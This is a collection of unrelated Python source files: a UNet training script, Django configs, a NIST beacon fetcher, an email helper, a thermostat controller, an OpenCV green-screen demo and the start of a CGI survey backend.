target_size = 20 # Smallest target size
fill_prob = 0.9
expansion_factor = 1 # generate higher resolution targets and downscale, improves aliasing effects
set_mean = [0.5, 0.5, 0.5]
set_std = [0.5, 0.5, 0.5]
target_transforms = T.Compose([
T.RandomPerspective(distortion_scale=0.5, p=1.0),
])
train_transforms = T.Compose([
CustomTransformation(),
T.ToTensor(),
AddGaussianNoise(std=0.01)
])
val_transforms = T.Compose([
T.ToTensor(),
])
# Prepare datasets
train_dataset = LiveSegmentDataset(length=train_size,
input_size=input_size, target_size=target_size,
expansion_factor=expansion_factor, bkg_path=bkg_path, fill_prob=fill_prob,
target_transforms=target_transforms, transforms=train_transforms)
train_loader = DataLoader(dataset=train_dataset, batch_size=batch_size ,shuffle=shuffle,
num_workers=num_workers, drop_last=drop_last, persistent_workers=(True if num_workers > 0 else False))
print("mean :", set_mean)
print("std :", set_std)
# Create model and optimizer
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print('device :', device)
model = UNet(in_channels, out_channels, model_type, filters, activation, set_mean, set_std).to(device)
# Uncomment to test the model before training
# view_outputs(model, train_dataset, threshold=0.5); exit()
# TODO : split params so there is no weight decay on batchnorm
# Setup optimizer
if optim_type == 'sgd':
optimizer = optim.SGD(model.parameters(), lr=base_lr, momentum=momentum, nesterov=nesterov, weight_decay=weight_decay)
elif optim_type == 'rmsprop':
optimizer = optim.RMSprop(model.parameters(), lr=base_lr, weight_decay=weight_decay, momentum=momentum)
elif optim_type == 'adam':
optimizer = optim.Adam(model.parameters(), lr=base_lr)
elif optim_type == 'adamw':
optimizer = optim.AdamW(model.parameters(), lr=base_lr, weight_decay=weight_decay)
elif optim_type == 'adagrad':
optimizer = optim.Adagrad(model.parameters(), lr=base_lr, weight_decay=weight_decay)
# Setup scheduler
if scheduler_type == 'step':
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=lr_milestones, gamma=lr_gamma)
elif scheduler_type == 'plateau':
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=lr_gamma, patience=plateau_patience, verbose=True)
elif scheduler_type == 'exp':
scheduler = optim.lr_scheduler.ExponentialLR(optimizer, gamma=lr_gamma)
else:
scheduler = None
# Setup amp
if use_amp:
scalar = amp.GradScaler()
# Setup run data
base_save = f"runs/unet"
save_path = lambda r, t : base_save + '/run{:05d}_{}.pth'.format(r, t)
if not os.path.exists(base_save):
os.makedirs(base_save)
def time_to_string(t):
if t > 3600: return "{:.2f} hours".format(t/3600)
if t > 60: return "{:.2f} minutes".format(t/60)
else: return "{:.2f} seconds".format(t)
current_run = 0
with open('runs/LASTRUN.txt') as f:
current_run = int(f.read()) + 1
with open('runs/LASTRUN.txt', 'w') as f:
f.write("%s\n" % current_run)
print("current run :", current_run)
# Create logger
log_name = "run{:05d}".format(current_run)
log_headers = ['epoch', 'iterations', 'elapsed_time', 'lr', 'train_loss',
'acc', 'bce', 'jaccard', 'dice', 'tversky', 'focal']
logger = Logger(name=log_name, headers=log_headers, folder=base_save)
run_stats = []
# Training loop
print(" * Start training...")
t0 = time.time()
iterations = 0
for epoch in range(train_epochs): # loop over the dataset multiple times
t1 = time.time()
epoch_loss_total = 0.0
batch_metrics_total = Counter({})
model.train()
model.freeze_norm()
for batch_idx, (data, true_masks) in enumerate(train_loader):
data = data.to(device=device)
true_masks = true_masks.to(device=device)
optimizer.zero_grad() # TODO : test each optimizer for set_to_none=True
if use_amp:
with amp.autocast():
with torch.autograd.set_detect_anomaly(detect_grad_failures):
logits = model(data)
loss = calc_loss(logits, true_masks)
scalar.scale(loss).backward()
if clip_grad_max != None:
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), clip_grad_max)
scalar.step(optimizer)
scalar.update()
else:
logits = model(data)
loss = calc_loss(logits, true_masks)
loss.backward()
if clip_grad_max != None:
torch.nn.utils.clip_grad_norm_(model.parameters(), clip_grad_max)
optimizer.step()
iterations += 1
# Update running metrics
batch_metrics = calc_metrics(logits, true_masks)
epoch_loss_total += loss.item()
batch_metrics_total += Counter(batch_metrics)
# END EPOCH LOOP
epoch_loss = epoch_loss_total/len(train_loader)
batch_metrics_avg = {k: v / len(train_loader) for k, v in batch_metrics_total.items()}
epoch_metrics = {
"epoch": epoch+1,
"iterations": iterations,
"elapsed_time": time.time()-t0,
"lr": optimizer.param_groups[0]['lr'],
"train_loss": epoch_loss
}
epoch_metrics.update(batch_metrics_avg)
logger.update(epoch_metrics)
run_stats.append(epoch_metrics)
if scheduler:
if type(scheduler) == optim.lr_scheduler.ReduceLROnPlateau:
scheduler.step(epoch_loss)
elif type(scheduler) == optim.lr_scheduler.MultiStepLR:
scheduler.step()
duration = time.time()-t1
remaining = duration*(train_epochs-epoch-1)
print("epoch {}. {} iterations: {}. loss={:.04f}. lr={:.06f}. elapsed={}. remaining={}.".format(epoch+1, iterations, time_to_string(duration), epoch_loss, optimizer.param_groups[0]['lr'], time_to_string(time.time()-t0), time_to_string(remaining)))
# END TRAIN LOOP
print('Finished Training. Duration={}. {} iterations.'.format(time_to_string(time.time()-t0), iterations))
print("Final stats:")
print("loss={:.05f}. acc={:.04f}. bce={:.05f}. jaccard={:.04f}. dice={:.04f}. tversky={:.04f}. focal={:.06f}.".format(epoch_metrics["train_loss"], epoch_metrics["acc"], epoch_metrics["bce"], epoch_metrics["jaccard"], epoch_metrics["dice"], epoch_metrics["tversky"], epoch_metrics["focal"]))
# Save Model
if save_final:
save_unet(model, save_path(current_run, "final"))
if run_validation:
print(" * Running validation...")
set_seed(MANUAL_SEED)
model.eval()
val_loss_total = 0.0
val_metrics_total = Counter({})
t0 = time.time()
for epoch in range(val_epochs):
t1 = time.time()
for batch_idx, (data, true_masks) in enumerate(train_loader):
data = data.to(device=device)
true_masks = true_masks.to(device=device)
with torch.no_grad():
if use_amp:
with amp.autocast():
logits = model(data)
loss = calc_loss(logits, true_masks)
else:
logits = model(data)
loss = calc_loss(logits, true_masks)
batch_metrics = calc_metrics(logits, true_masks)
val_loss_total += loss.item()
val_metrics_total += Counter(batch_metrics)
duration = time.time()-t1
print("validation {}/{}. elapsed={}. remaining={}.".format(epoch+1, val_epochs, time_to_string(time.time()-t0), time_to_string(remaining)))
# END VALIDATION LOOP
val_loss = val_loss_total/(val_epochs*len(train_loader))
val_metrics = {k: v/(val_epochs*len(train_loader)) for k, v in val_metrics_total.items()}
print("Validation stats:")
print("loss={:.05f}. acc={:.04f}. bce={:.05f}. jaccard={:.04f}. dice={:.04f}. tversky={:.04f}. focal={:.06f}.".format(val_loss, val_metrics["acc"], val_metrics["bce"], val_metrics["jaccard"], val_metrics["dice"], val_metrics["tversky"], val_metrics["focal"]))
if view_results:
view_outputs(model, train_dataset, threshold=view_threshold)
# Graph metrics
if graph_metrics:
line_colors = [
'#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22', '#17becf'
]
fig, ax = plt.subplots(2, 3, figsize=(12,8)) # w, h
font_size = 16
# loss, top 0
ax[0][0].set_xlabel('epochs', fontsize=font_size)
ax[0][0].set_ylabel('train loss', fontsize=font_size)
ax[0][0].set_yscale('log')
ax[0][0].tick_params(axis='y')
ax[0][0].plot(range(1, train_epochs+1), [x["train_loss"] for x in run_stats], color=line_colors[0], label="train loss")
# bce, top 1
ax[0][1].set_xlabel('epochs', fontsize=font_size)
ax[0][1].set_ylabel('bce', fontsize=font_size)
ax[0][1].set_yscale('log')
ax[0][1].tick_params(axis='y')
ax[0][1].plot(range(1, train_epochs+1), [x["bce"] for x in run_stats], color=line_colors[0], label="bce loss")
# focal, top 2
ax[0][2].set_xlabel('epochs', fontsize=font_size)
ax[0][2].set_ylabel('focal', fontsize=font_size)
ax[0][2].set_yscale('log')
ax[0][2].tick_params(axis='y')
ax[0][2].plot(range(1, train_epochs+1), [x["focal"] for x in run_stats], color=line_colors[0], label="focal loss")
# lr, bot 0
ax[1][0].set_xlabel('epochs', fontsize=font_size)
ax[1][0].set_ylabel('lr', fontsize=font_size)
ax[1][0].set_yscale('log')
ax[1][0].tick_params(axis='y')
ax[1][0].plot(range(1, train_epochs+1), [x["lr"] for x in run_stats], color=line_colors[0], label="lr")
# coef, bot 1
ax[1][1].set_xlabel('epochs', fontsize=font_size)
ax[1][1].set_ylabel('coefficients', fontsize=font_size)
ax[1][1].tick_params(axis='y')
coef = ["jaccard", "dice", "tversky"]
for i in range(len(coef)):
ax[1][1].plot(range(1, train_epochs+1), [x[coef[i]] for x in run_stats], color=line_colors[i], label=coef[i])
ax[1][1].legend()
# acc, bot 2
ax[1][2].set_xlabel('epochs', fontsize=font_size)
ax[1][2].set_ylabel('acc', fontsize=font_size)
# ax[1][2].set_yscale('log')
ax[1][2].tick_params(axis='y')
ax[1][2].plot(range(1, train_epochs+1), [x["acc"] for x in run_stats], color=line_colors[0], label="acc")
fig.tight_layout() # otherwise the right y-label is slightly clipped
fig.savefig("{}/run{:05d}_metrics.png".format(base_save, current_run), bbox_inches='tight')
plt.show()
|
from django import urls
from django .urls import path
from .views import home
app_name='Core'
urlpatterns=[
path('', home,name="home_view"),
] |
import requests
from nistrecord import NistRecord
class NistFetcher(object):
def __init__(self):
self.certificate = None
r = requests.get('https://beacon.nist.gov/certificate/beacon.cer')
if r.status_code != 200:
raise IOError
else:
self.certificate = r.content
def currentRecord(self, timestamp):
r = requests.get('https://beacon.nist.gov/rest/record/' + str(timestamp))
if r.status_code == 200:
return NistRecord(r.content, self.certificate)
else:
raise IOError
def previousRecord(self,timestamp):
r = requests.get('https://beacon.nist.gov/rest/record/previous/' + str(timestamp))
if r.status_code == 200:
return NistRecord(r.content, self.certificate)
else:
#print r.status_code
#print r.headers
#print r.content
raise IOError
def nextRecord(self,timestamp):
r = requests.get('https://beacon.nist.gov/rest/record/next/' + str(timestamp))
if r.status_code == 200:
return NistRecord(r.content, self.certificate)
else:
raise IOError
def lastRecord(self):
r = requests.get('https://beacon.nist.gov/rest/record/last')
if r.status_code == 200:
return NistRecord(r.content, self.certificate)
else:
raise IOError
def startChainRecord(self, timestamp):
r = requests.get('https://beacon.nist.gov/rest/record/start-chain/' + str(timestamp))
if r.status_code == 200:
return NistRecord(r.content, self.certificate)
else:
raise IOError
def verifyChain(self, fromTimestamp):
steps = 1
cr = self.currentRecord(fromTimestamp)
if not cr.isVerified:
raise Exception('CurrentRecord %d not verified' % (cr.timestamp))
sr = self.startChainRecord(fromTimestamp)
if not sr.isVerified:
raise Exception('StartChainRecord %d not verified' % (sr.timestamp))
while (cr.timestamp >= sr.timestamp):
pr = self.previousRecord(cr.timestamp)
if not pr.isVerified:
raise Exception('ChainRecord %d not verified' % (pr.timestamp))
if not pr.randomNumber != cr.previousRecord:
raise Exception('Chain broken between %d and %d' % (pr.timestamp, cr.timestamp)
cr = pr
steps++
return steps |
#!/usr/bin/env python
import sys
import os
BASE_DIR = os.path.abspath( os.path.join( os.path.dirname( __file__ ), ".." ) )
path = os.path.abspath( os.path.join( BASE_DIR, "python" ) )
sys.path.append( path )
import numpy as np
import pylab as pl
import momo
width = 150
height = 50
radius = 10
cell_size = 1
convert = momo.convert( { "x1": 0, "y1": 0, "x2": width, "y2": height }, cell_size )
compute_features = momo.features.test.compute_features( convert, radius = radius )
frame = np.array( [
[15.0, 15.0, 0.0, 0.0],
[135.0, 35.0, 0.0, 0.0]
] )
features = compute_features( frame )
pl.imshow( features[0], pl.cm.jet, None, None, "none" )
pl.show()
|
"""
A Simple Interface to Sending Email
Ben Adida (ben@adida.net)
"""
from base import config
from smtplib import SMTP
from email.MIMEText import MIMEText
from email.Header import Header
from email.Utils import parseaddr, formataddr
SMTP_SERVER = config.SMTP_SERVER
def simple_send(recipient, sender, subject, body, reply_to=None):
"""Send an email.
All arguments should be Unicode strings (plain ASCII works as well).
Only the real name part of sender and recipient addresses may contain
non-ASCII characters.
The email will be properly MIME encoded and delivered though SMTP to
localhost port 25. This is easy to change if you want something different.
The charset of the email will be the first one out of US-ASCII, ISO-8859-1
and UTF-8 that can represent all the characters occurring in the email.
"""
msg = createMessage(recipient, sender, subject, body, reply_to)
# Send the message via SMTP to localhost:25
smtp = SMTP(SMTP_SERVER)
if config.SMTP_USER:
smtp.login(config.SMTP_USER, config.SMTP_PASSWORD)
smtp.sendmail(sender, recipient, msg.as_string())
smtp.quit()
def no_send(recipient, sender, subject, body, reply_to=None):
msg = createMessage(recipient, sender, subject, body, reply_to)
print "== CONFIG SAYS NOT TO SEND EMAIL, so here it is =="
print msg.as_string()
print "==================================================\n\n"
def createMessage(recipients, sender, subject, body, reply_to=None):
# Header class is smart enough to try US-ASCII, then the charset we
# provide, then fall back to UTF-8.
header_charset = 'ISO-8859-1'
# We must choose the body charset manually
for body_charset in 'US-ASCII', 'ISO-8859-1', 'UTF-8':
try:
body.encode(body_charset)
except UnicodeError:
pass
else:
break
# Split real name (which is optional) and email address parts
sender_name, sender_addr = parseaddr(sender)
reply_to_name, reply_to_addr = parseaddr(reply_to)
recipient_names = []
recipient_addrs = []
for recipient in recipients.split(', '):
recipient_names.append(parseaddr(recipient)[0])
recipient_addrs.append(parseaddr(recipient)[1])
# We must always pass Unicode strings to Header, otherwise it will
# use RFC 2047 encoding even on plain ASCII strings.
sender_name = str(Header(unicode(sender_name), header_charset))
reply_to_name = str(Header(unicode(reply_to_name), header_charset))
for recipient_name in recipient_names:
recipient_name = str(Header(unicode(recipient_name), header_charset))
# Make sure email addresses do not contain non-ASCII characters
sender_addr = sender_addr.encode('ascii')
reply_to_addr = reply_to_addr.encode('ascii')
for recipient_addr in recipient_addrs:
recipient_addr = recipient_addr.encode('ascii')
# Create the message ('plain' stands for Content-Type: text/plain)
msg = MIMEText(body.encode(body_charset), 'plain', body_charset)
msg['From'] = formataddr((sender_name, sender_addr))
foo = [(recipient_names[i], recipient_addrs[i]) for i in range(len(recipient_names))]
msg['To'] = ", ".join([formataddr(f) for f in foo])
msg['Reply-To'] = formataddr((reply_to_name, reply_to_addr))
msg['Subject'] = Header(unicode(subject), header_charset)
return msg
# don't send email if config says not to
if not config.SEND_MAIL:
simple_send = no_send
|
import imagesAlign as lk
import shared as sh
import os
import numpy as np
from matplotlib.pyplot import show, imshow, figure, title
# load patch
img_dir = '../../test-ballots/carlini/'
Iref=sh.standardImread(os.path.join(img_dir,'0.tif'),flatten=True)
M = np.zeros((Iref.shape[0],Iref.shape[1], 11))
for i in range(11):
I=sh.standardImread(os.path.join(img_dir,str(i+1)+'.tif'),flatten=True)
Inorm = np.zeros(Iref.shape)
# make patch the same size as Iref
min0 = min(I.shape[0],Iref.shape[0])
min1 = min(I.shape[1],Iref.shape[1])
Inorm[0:min0,0:min1] = I[0:min0,0:min1]
diff0 = Iref.shape[0] - I.shape[0]
diff1 = Iref.shape[1] - I.shape[1]
if diff0 > 0:
Inorm[I.shape[0]:I.shape[0]+diff0,:] = 1
if diff1 > 0:
Inorm[:,I.shape[1]:I.shape[1]+diff1] = 1
res=lk.imagesAlign(Inorm,Iref)
M[:,:,i] = res[1]
meanOverlay = np.mean(M,axis=2)
minOverlay = np.min(M,axis=2)
maxOverlay = np.min(M,axis=2)
figure(0); imshow(meanOverlay,cmap='gray'); title('mean')
figure(1); imshow(minOverlay,cmap='gray'); title('min')
figure(2); imshow(maxOverlay,cmap='gray'); title('max')
show()
|
# Generated by Django 2.2.2 on 2019-10-15 09:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='missao',
name='foiConcluida',
),
migrations.AddField(
model_name='missao',
name='categoria',
field=models.CharField(choices=[('Concluída', 'Concluída'), ('Inconcluída', 'Inconcluída')], default=2, max_length=12),
preserve_default=False,
),
]
|
from gameboy.memory.memory_region import MemoryRegion
class InterruptFlagRegister(MemoryRegion):
INTERRUPT_VBLANK = 0x01
INTERRUPT_LCDC = 0x02
INTERRUPT_TIMA = 0x04
INTERRUPT_SERIAL = 0x08
INTERRUPT_JOYPAD = 0x10
INTERRUPT_MASK = 0x1F
def __init__(self):
super().__init__(bytearray(1), 0xFF0F)
self._data[0] = 0xE0
def set_vblank_interrupt(self):
self._data[0] = self._data[0] | self.INTERRUPT_VBLANK
def set_lcdc_interrupt(self):
self._data[0] = self._data[0] | self.INTERRUPT_LCDC
def set_tima_interrupt(self):
self._data[0] = self._data[0] | self.INTERRUPT_TIMA
def set_serial_interrupt(self):
self._data[0] = self._data[0] | self.INTERRUPT_SERIAL
def set_joypad_interrupt(self):
self._data[0] = self._data[0] | self.INTERRUPT_JOYPAD
def clear_vblank_interrupt(self):
self._data[0] = self._data[0] & ~self.INTERRUPT_VBLANK
def clear_lcdc_interrupt(self):
self._data[0] = self._data[0] & ~self.INTERRUPT_LCDC
def clear_tima_interrupt(self):
self._data[0] = self._data[0] & ~self.INTERRUPT_TIMA
def clear_serial_interrupt(self):
self._data[0] = self._data[0] & ~self.INTERRUPT_SERIAL
def clear_joypad_interrupt(self):
self._data[0] = self._data[0] & ~self.INTERRUPT_JOYPAD
def clear_interrupt_by_bit(self, bit_to_clear: int) -> None:
if bit_to_clear == self.INTERRUPT_VBLANK:
return self.clear_vblank_interrupt()
if bit_to_clear == self.INTERRUPT_LCDC:
return self.clear_lcdc_interrupt()
if bit_to_clear == self.INTERRUPT_TIMA:
return self.clear_tima_interrupt()
if bit_to_clear == self.INTERRUPT_SERIAL:
return self.clear_serial_interrupt()
if bit_to_clear == self.INTERRUPT_JOYPAD:
return self.clear_joypad_interrupt()
raise Exception('invalid bit to clear: {}'.format(bit_to_clear))
def write_byte(self, address: int, value: int):
# Top 4 bits of interrupt flags always read "1"s
return super().write_byte(address, value | 0xE0)
def get_interrupt_bits(self):
return self.read_byte(0xFF0F) & self.INTERRUPT_MASK
|
# -*- coding: UTF-8 -*-
from flask import Flask
from .web.ban import BanAPI
from .web.server import ServerAPI
from .config import Config
from .db import DB
class WebUI(object):
def __init__(self, config_file):
app = Flask(__name__, template_folder="web/templates")
self.config = Config(config_file)
self.ip_dbs = self.init_db(self.config.get_database('file'))
app.debug = True
app.add_url_rule('/bans/<ip>',
view_func=BanAPI.as_view('bans', bandb=self.ip_dbs,
user=self.config.get_gui('user'),
passwd=self.config.get_gui('pass')))
app.add_url_rule('/server/', view_func=ServerAPI.as_view('servers',
user=self.config.get_gui('user'),
passwd=self.config.get_gui('pass')))
app.run(host=self.config.get_gui('listen'),
port=int(self.config.get_gui('port')))
def init_db(self, dbfile):
''' Init database '''
bdb = DB(dbfile)
if bdb.exists() is not True:
return None
return bdb
|
import datetime, time, math, pytz, os, sys
import pandas as pd
import yaml
from NormalSchedule import NormalSchedule
from DataManager import DataManager
from Advise import Advise
from xbos import get_client
from xbos.services.hod import HodClientHTTP
from xbos.devices.thermostat import Thermostat
from xbos.services.pundat import DataClient, make_dataframe
# TODO only one zone at a time, making multizone comes soon
filename = "thermostat_changes.txt" # file in which the thermostat changes are recorded
# the main controller
def hvac_control(cfg, tstats, normal_zones):
now = datetime.datetime.utcnow().replace(tzinfo=pytz.timezone("UTC"))
dataManager = DataManager(cfg, now=now)
t_high, t_low, t_mode = dataManager.thermostat_setpoints()
# document the "before" state
try:
f = open(filename, 'a')
f.write("Did read: " + str(t_low) + ", " + str(t_high) + ", " + str(t_mode) + "\n")
f.close()
except:
print "Could not document changes."
# choose the apropriate setpoints according to weekday and time
weekno = now.astimezone(tz=pytz.timezone(cfg["Data_Manager"]["Pytz_Timezone"])).weekday()
if weekno<5:
now_time = now.astimezone(tz=pytz.timezone(cfg["Data_Manager"]["Pytz_Timezone"])).time()
if now_time >= datetime.time(18,0) or now_time < datetime.time(7,0):
heating_setpoint = 62.
cooling_setpoint = 85.
else:
heating_setpoint = 70.
cooling_setpoint = 76.
else:
heating_setpoint = 62.
cooling_setpoint = 85.
try:
Prep_Therm = dataManager.preprocess_therm()
adv = Advise(now.astimezone(tz=pytz.timezone(cfg["Data_Manager"]["Pytz_Timezone"])),
dataManager.preprocess_occ(),
Prep_Therm,
dataManager.weather_fetch(),
cfg["Energy_rates"],
cfg["Advise"]["Lambda"],
cfg["Interval_Length"],
cfg["Advise"]["Hours"],
cfg["Advise"]["Print_Graph"],
cfg["Advise"]["Maximum_Safety_Temp"],
cfg["Advise"]["Minimum_Safety_Temp"],
cfg["Advise"]["Heating_Consumption"],
cfg["Advise"]["Cooling_Consumption"],
cfg["Advise"]["Max_Actions"],
cfg["Advise"]["Thermal_Precision"])
action = adv.advise()
temp = float(Prep_Therm['t_next'][-1])
except:
e = sys.exc_info()[0]
print e
return False
# action "0" is Do Nothing, action "1" is Cooling, action "2" is Heating
if action == "0":
p = {"override": True, "heating_setpoint": math.floor(temp-0.1)-1, "cooling_setpoint": math.ceil(temp+0.1)+1, "mode": 3}
print "Doing nothing"
print p
# document changes
try:
f = open(filename, 'a')
f.write("Did write: " + str(math.floor(temp-0.1)-1) + ", " + str(math.ceil(temp+0.1)+1) + ", " + str(3) +"\n")
f.close()
except:
print "Could not document changes."
elif action == "1":
p = {"override": True, "heating_setpoint": heating_setpoint, "cooling_setpoint": math.floor(temp-0.1), "mode": 3}
print "Heating"
print p
# document changes
try:
f = open(filename, 'a')
f.write("Did write: " + str(heating_setpoint) + ", " + str(math.floor(temp-0.1)) + ", " + str(3) + "\n")
f.close()
except:
print "Could not document changes."
elif action == "2":
p = {"override": True, "heating_setpoint": math.ceil(temp+0.1), "cooling_setpoint": cooling_setpoint, "mode": 3}
print "Cooling"
print p
# document changes
try:
f = open(filename, 'a')
f.write("Did write: " + str(math.ceil(temp+0.1)) + ", " + str(cooling_setpoint) + ", " + str(3) + "\n")
f.close()
except:
print "Could not document changes."
else:
print "Problem with action."
return False
# try to commit the changes to the thermostat, if it doesnt work 10 times in a row ignore and try again later
for z in normal_zones:
for i in range(10):
try:
tstats[z].write(p)
break
except:
if i == 9:
e = sys.exc_info()[0]
print e
return False
continue
return True
if __name__ == '__main__':
# read from config file
try:
yaml_filename = sys.argv[1]
except:
sys.exit("Please specify the configuration file as: python2 controller.py config_file.yaml")
with open(yaml_filename, 'r') as ymlfile:
cfg = yaml.load(ymlfile)
if not os.path.exists(filename):
f = open(filename , 'w')
f.close()
if cfg["Data_Manager"]["Server"]:
client = get_client(agent=cfg["Data_Manager"]["Agent_IP"], entity=cfg["Data_Manager"]["Entity_File"])
else:
client = get_client()
hc = HodClientHTTP("http://ciee.cal-sdb.org")
q = """SELECT ?uri ?zone WHERE {
?tstat rdf:type/rdfs:subClassOf* brick:Thermostat .
?tstat bf:uri ?uri .
?tstat bf:controls/bf:feeds ?zone .
};
"""
tstats = {}
for tstat in hc.do_query(q):
print tstat
tstats[tstat["?zone"]] = Thermostat(client, tstat["?uri"])
normal_zones = [cfg["Data_Manager"]["Zone"]]
starttime=time.time()
while True:
if not hvac_control(cfg, tstats, normal_zones):
print("Problem with MPC, entering normal schedule.")
normal_schedule = NormalSchedule(cfg, tstats, normal_zones)
normal_schedule.normal_schedule()
print datetime.datetime.now()
time.sleep(60.*15. - ((time.time() - starttime) % (60.*15.)))
|
import cv2
import numpy as np
def empty(a):
pass
def stackImages(scale,imgArray):
rows = len(imgArray)
cols = len(imgArray[0])
rowsAvailable = isinstance(imgArray[0], list)
width = imgArray[0][0].shape[1]
height = imgArray[0][0].shape[0]
if rowsAvailable:
for x in range ( 0, rows):
for y in range(0, cols):
if imgArray[x][y].shape[:2] == imgArray[0][0].shape [:2]:
imgArray[x][y] = cv2.resize(imgArray[x][y], (0, 0), None, scale, scale)
else:
imgArray[x][y] = cv2.resize(imgArray[x][y], (imgArray[0][0].shape[1], imgArray[0][0].shape[0]), None, scale, scale)
if len(imgArray[x][y].shape) == 2: imgArray[x][y]= cv2.cvtColor( imgArray[x][y], cv2.COLOR_GRAY2BGR)
imageBlank = np.zeros((height, width, 3), np.uint8)
hor = [imageBlank]*rows
hor_con = [imageBlank]*rows
for x in range(0, rows):
hor[x] = np.hstack(imgArray[x])
ver = np.vstack(hor)
else:
for x in range(0, rows):
if imgArray[x].shape[:2] == imgArray[0].shape[:2]:
imgArray[x] = cv2.resize(imgArray[x], (0, 0), None, scale, scale)
else:
imgArray[x] = cv2.resize(imgArray[x], (imgArray[0].shape[1], imgArray[0].shape[0]), None,scale, scale)
if len(imgArray[x].shape) == 2: imgArray[x] = cv2.cvtColor(imgArray[x], cv2.COLOR_GRAY2BGR)
hor= np.hstack(imgArray)
ver = hor
return ver
cap = cv2.VideoCapture(0)
#Define width
cap.set(3, 640)
#Define height
cap.set(4, 480)
#change brightness
cap.set(10, 200)
cv2.namedWindow("TrackBars")
cv2.resizeWindow("TrackBars", 640, 240)
cv2.createTrackbar("Hue Min", "TrackBars", 73, 179, empty)
cv2.createTrackbar("Hue Max", "TrackBars", 96, 179, empty)
cv2.createTrackbar("Sat Min", "TrackBars", 37, 255, empty)
cv2.createTrackbar("Sat Max", "TrackBars", 115, 255, empty)
cv2.createTrackbar("Val Min", "TrackBars", 170, 255, empty)
cv2.createTrackbar("Val Max", "TrackBars", 255, 255, empty)
videoBackground = cv2.VideoCapture("C:/Users/Zac/Desktop/OpenCV/Images/ConcertCrowdBackground.mp4")
while True:
success, imgCamera = cap.read()
imgCameraHSV = cv2.cvtColor(imgCamera, cv2.COLOR_BGR2HSV)
h_min = cv2.getTrackbarPos("Hue Min", "TrackBars")
h_max = cv2.getTrackbarPos("Hue Max", "TrackBars")
s_min = cv2.getTrackbarPos("Sat Min", "TrackBars")
s_max = cv2.getTrackbarPos("Sat Max", "TrackBars")
v_min = cv2.getTrackbarPos("Val Min", "TrackBars")
v_max = cv2.getTrackbarPos("Val Max", "TrackBars")
lower = np.array([h_min, s_min, v_min])
upper = np.array([h_max, s_max, v_max])
mask = cv2.inRange(imgCameraHSV, lower, upper)
imgResult = cv2.bitwise_and(imgCamera, imgCamera, mask = mask)
inverseMask = cv2.bitwise_not(mask)
imgResult2 = cv2.bitwise_and(imgCamera, imgCamera, mask = inverseMask)
imgStack = stackImages(0.6, ([imgCamera, imgCameraHSV], [mask, imgResult], [inverseMask, imgResult2]))
cv2.imshow("Stacked Images", imgStack)
success2, imgBackground = videoBackground.read()
#imgBackground = cv2.imread("C:/Users/Zac/Desktop/OpenCV/Images/beach.jpg")
#rows, cols, channels = imgBackground.shape
#print(imgBackground.shape)
rows,cols, = 480,640
roi = imgBackground[0:rows, 0:cols ]
#print(imgBackground.shape)
#rowsBackground, colsBackground, channels = imgBackground.shape
'''
rowStart = int((rowsBackground - rows) / 2)
rowFinish = int(rowStart + rows)
colsStart = int(colsBackground - cols)
print(rowStart, rowFinish, colsStart, colsBackground)
roi = imgBackground[rowStart:rowFinish, colsStart:colsBackground]
'''
# Now create a mask of logo and create its inverse mask also
img2gray = cv2.cvtColor(imgResult2, cv2.COLOR_BGR2GRAY)
ret, mask3 = cv2.threshold(img2gray, 10, 255, cv2.THRESH_BINARY)
mask_inv = cv2.bitwise_not(mask3)
# Now black-out the area of logo in ROI
imgBackground_bg = cv2.bitwise_and(roi,roi, mask = mask_inv)
# Take only region of logo from logo image.
imgResult2_fg = cv2.bitwise_and(imgResult2, imgResult2, mask = mask3)
# Put logo in ROI and modify the main image
dst = cv2.add(imgBackground_bg,imgResult2_fg)
imgBackground[0:rows, 0:cols ] = dst
cv2.imshow("GreenScreen?", imgBackground)
cv2.waitKey(1) |
# metadata.py
"""
File containing metadata information for WW2100 model run
"""
class UnknownFileType(BaseException):
pass
##model_run = 'MIROC'
def define_model_run():
import xlrd
model_book = xlrd.open_workbook('Master File.xls')
Refer = str(model_book.sheet_by_index(0).col_values(0)[1]) #find the reference model type
if Refer[-12:-9] == 'Ref':
reference = 'MIROC'
elif Refer[-16:-9] == 'LowClim':
reference = 'GFDL'
elif Refer[-20:-9] == 'FireSupress':
reference = 'AltFire'
elif Refer[-17:-9] == 'HighClim':
reference = 'HADLEY'
elif Refer[-16:-9] == 'HighPop':
reference = 'AltPop'
elif Refer[-18:-9] == 'UrbExpand':
reference = 'AltUGAThresh'
else:
raise UnknownFileType()
Compare = str(model_book.sheet_by_index(0).col_values(1)[1]) #find the comparative model type
if Compare[-12:-9] == 'Ref':
comparative = 'MIROC'
elif Compare[-16:-9] == 'LowClim':
comparative = 'GFDL'
elif Compare[-21:-9] == 'FireSuppress':
comparative = 'AltFire'
elif Compare[-17:-9] == 'HighClim':
comparative = 'HADLEY'
elif Compare[-16:-9] == 'HighPop':
comparative = 'AltPop'
elif Compare[-18:-9] == 'UrbExpand':
comparative = 'AltUGAThresh'
else:
raise UnknownFileType()
model_run = comparative + ' climate minus ' + reference
return model_run
model_run = define_model_run() #run the program and get the metadata
|
#!/usr/bin/env python
""" This Program returns the Data for the Header and Body Elements of a
Dynamically Generated HTML Survey Called by index.html"""
# -*- coding: UTF-8 -*-
# use the cgi library
import cgi
# enable debugging
#import cgitb
#cgitb.enable()
# use JSON encoding
import json
# use python sqlite3 database
import sqlite3
#Define Main Function
def main():
fs = cgi.FieldStorage()
svCode = fs.getvalue("SURVEY")
svPart = fs.getvalue("SVPART")
svOwner = fs.getvalue("SVOWNER")
if svCode == None:
svCode = "*"
if svPart == None:
svPart = "BOTH"
hdr_json = None
bdy_json = None
try:
# connect to the database
dbc = sqlite3.connect("data/rsp-survey.db")
dbc.row_factory = sqlite3.Row
# check for SURVEY data tables
dbc.execute('''CREATE TABLE IF NOT EXISTS SURVEY_HDR
(`SH_CODE` TEXT NOT NULL UNIQUE DEFAULT 'SRV0001',
`SH_OWNER` TEXT NOT NULL DEFAULT 'Admin',
`SH_STATUS` TEXT NOT NULL DEFAULT 'Ready',
`SH_TYPE` TEXT NOT NULL DEFAULT 'Default',
`SH_NAME` TEXT,
